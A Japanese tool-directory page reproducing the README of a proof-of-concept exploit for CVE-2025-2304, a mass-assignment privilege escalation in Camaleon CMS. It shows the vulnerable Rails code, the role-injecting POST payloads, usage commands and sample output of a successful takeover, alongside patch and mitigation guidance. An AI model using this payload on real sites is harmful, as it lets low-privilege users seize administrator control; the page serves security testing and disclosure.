Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2304-POC — Camaleon CMSにおけるCVE-2025-2304の概念実証 — 重大(CVSS 9.4)な大量代入特権昇格 | Kitploit
ツール/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
特権昇格ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Camaleon CMSにおけるCVE-2025-2304の概念実証 — 重大(CVSS 9.4)な大量代入特権昇格

リポジトリを見る
10345ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2304 PoC - Camaleon CMS 権限昇格

CVE CVSS Python License

Camaleon CMS の重大なマスアサインメント脆弱性 CVE-2025-2304 の Proof of Concept (PoC) エクスプロイトです。低権限ユーザーから管理者への権限昇格を可能にします。

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 目次

  • 概要
  • 脆弱性の詳細
  • 機能
  • インストール
  • 使い方
  • 例
  • 影響を受けるバージョン
  • 緩和策
  • 免責事項
  • 参考文献
  • 作成者

🔍 概要

CVE-2025-2304 は、Camaleon CMS の UsersController の updated_ajax メソッドに存在する 重大なマスアサインメント脆弱性です。脆弱性は、Rails の危険な permit! メソッドが原因で生じており、すべてのパラメータがフィルタリングなしで通過することを許します。

この PoC は、低権限の認証済みユーザーがパスワード変更操作中に不正なパラメータを注入することで管理者ロールに昇格できることをデモンストレーションします。

CVSS スコア: 9.4 (致命的)

🐛 脆弱性の詳細

根本原因

脆弱なコードは params.require(:user).permit! を使用しており、検証なしですべてのユーザー提供パラメータを受け入れます:

def updated_ajax
  user_params = params.require(:user).permit!  # 危険!
  current_user.update(user_params)
end

悪用方法

攻撃者は正規のパスワード変更フィールドに加えて user[role]=admin のような追加パラメータを注入し、アプリケーションがユーザーロールを管理者に更新するよう仕向けます。

攻撃ベクトル:

  1. 低権限ユーザー(例: "client" ロール)として認証
  2. crafted POST リクエストを /admin/users/{id}/updated_ajax に送信
  3. user[role]=admin パラメータを注入
  4. ユーザーロールが管理者に昇格

✨ 機能

  • ✅ 安全なテスト: エクスプロイト中にユーザーパスワードを保持
  • ✅ 複数のペイロード: 7種類以上の注入手法をテスト
  • ✅ バージョン検出: 脆弱な CMS バージョンを自動検出
  • ✅ 非破壊オプション: --no-password-field フラグで最も安全なテスト
  • ✅ プロキシ対応: Burp Suite/ZAP と統合し手動解析をサポート
  • ✅ Verbose モード: デバッグ用の詳細出力
  • ✅ 管理者乗っ取り: オプションで管理者パスワードリセット攻撃
  • ✅ 色分け出力: 成功/失敗の明確な視覚的インジケータ

📦 インストール

必要条件

  • Python 3.7+
  • pip (Python パッケージマネージャ)

リポジトリのクローン

git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

依存関係のインストール

pip install -r requirements.txt

または手動でインストール:

pip install requests beautifulsoup4

🚀 使い方

基本構文

python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

コマンドラインオプション

positional arguments:
  target                ターゲット URL (例: http://target.com)

required arguments:
  -u, --username        認証用の既存ユーザー名
  -p, --password        ユーザーパスワード

optional arguments:
  -h, --help            ヘルプメッセージを表示して終了
  -v, --verbose         詳細出力(すべてのリクエストを表示)
  --proxy PROXY         トラフィック検査用の HTTP プロキシ (例: http://127.0.0.1:8080)
  --no-password-field   パスワードフィールドなしでエクスプロイトをテスト(最も安全)
  --skip-admin-test     破壊的な管理者パスワードリセットテストをスキップ

📚 例

標準テスト(推奨)

パスワードを保持したまま既存ユーザー認証情報でテスト:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

最も安全なテスト(パスワードフィールドなし)

エクスプロイトペイロードにパスワードフィールドを含めずにテスト:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Burp Suite プロキシ使用時

Burp Suite 経由でトラフィックをルーティングし手動検査:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Verbose モード

すべてのリクエストとレスポンスを表示する詳細出力:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

破壊的テストをスキップ

権限昇格のみテストし、管理者パスワードリセットをスキップ:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 出力例

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS 権限昇格 PoC
   マスアサインメント脆弱性テスター
   作成者: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] ターゲット: http://target.com
[*] ユーザー名: testuser
[*] パスワード: **********

[*] testuser としてログイン中...
[+] ログイン成功

[*] CMS バージョン確認中...
[*] 検出されたバージョン: 2.9.0
[+] このバージョンは脆弱です (< 2.9.1)

============================================================
[*] CVE-2025-2304 マスアサインメント脆弱性のテスト中
============================================================

[*] 対象ユーザー: testuser (ID: 7)
[*] 現在のロール: Client (client)
[*] パスワードは変更されません

[1/7] テスト中: AJAX エンドポイント - user[role]
    ✗ 失敗
[2/7] テスト中: AJAX エンドポイント - password[role]
============================================================
[+] エクスプロイト成功!
============================================================
[+] 権限昇格: Client → 管理者
[+] 脆弱なエンドポイント: /admin/users/7/updated_ajax
[+] 有効なペイロード: {'password[role]': 'admin'}
[+] パスワード変更なし: ユーザーは通常通りログイン可能
[+] CVE-2025-2304 確認済み!

[✓] CVE-2025-2304 脆弱性確認

🎯 影響を受けるバージョン

バージョンステータス
< 2.9.1❌ 脆弱
≥ 2.9.1✅ パッチ適用済み

特に脆弱なバージョン:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x およびそれ以前

🛡️ 緩和策

即時対応

  1. バージョン 2.9.1 以降にアップグレード

    gem update camaleon_cms
    
  2. ユーザーアカウントの監査

    • 予期しない権限変更の確認
    • ユーザーロール変更ログの確認
    • /users/*/updated_ajax への不審な POST リクエストの確認
  3. パスワードリセットの強制(侵害が疑われる場合)

    • すべての特権アカウントのパスワードをリセット
    • 既存セッションを無効化

長期的な予防策

安全なコードパターン:

危険な permit! を明示的なホワイトリストに置き換え:

# 修正前(脆弱)
def updated_ajax
  user_params = params.require(:user).permit!
  current_user.update(user_params)
end

# 修正後(安全)
def updated_ajax
  user_params = params.require(:user).permit(:password, :password_confirmation)
  current_user.update(user_params)
end

追加のセキュリティ対策:

  • アプリケーション全体で強力なパラメータフィルタリングを実装
  • 重要な操作にはロール変更の承認ワークフローを追加
  • 権限変更の監査ログを有効化
  • 最小特権の原則を適用
  • WAF ルールでマスアサインメント試行を監視

⚠️ 免責事項

このツールは教育目的および許可されたセキュリティテスト目的のみで提供されます。

法的注意事項:

  • このツールは、自分が所有するシステム、またはテストのための明示的な書面による許可を得たシステムでのみ使用してください
  • コンピュータシステムへの不正アクセスは、次のような法律で違法とされています:
    • アメリカ合衆国のコンピュータ詐欺および濫用法 (CFAA)
    • イギリスのコンピュータ不正使用法 1990
    • その他の管轄区域における同様の法律
  • 作成者は、このツールの誤用または損害について一切の責任を負いません
  • 利用者は自己の行動に単独で責任を負います

倫理的利用:

  • テスト前に適切な許可を取得してください
  • 責任ある開示慣行に従ってください
  • 許可された範囲内での侵入テスト業務で使用してください
  • 管理されたラボ環境での教育目的に限ります

📖 参考文献

  • CVE エントリ: CVE-2025-2304
  • GHSA アドバイザリ: GHSA-rp28-mvq3-wf8j
  • ベンダーアドバイザリ: Tenable Security Research TRA-2025-09
  • パッチコミット: GitHub Commit 179fd6b
  • リリースノート: Camaleon CMS 2.9.1

👤 作成者

d3vn0mi

  • GitHub: @d3vn0mi
  • 個人ウェブサイト: @d3vn0mi
  • 個人ブログ: @d3vn0mi

📝 ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています - 詳細は LICENSE ファイルを参照してください。

🤝 貢献

コントリビューション、問題、機能リクエストを歓迎します!

issues ページ をチェックしてください。

⭐ サポートを示す

このプロジェクトが役に立った場合は ⭐ を付けてください!


注: このリポジトリはセキュリティ研究および教育目的です。常に責任ある開示を実践し、テスト前に適切な許可を取得してください。

ツールをダウンロード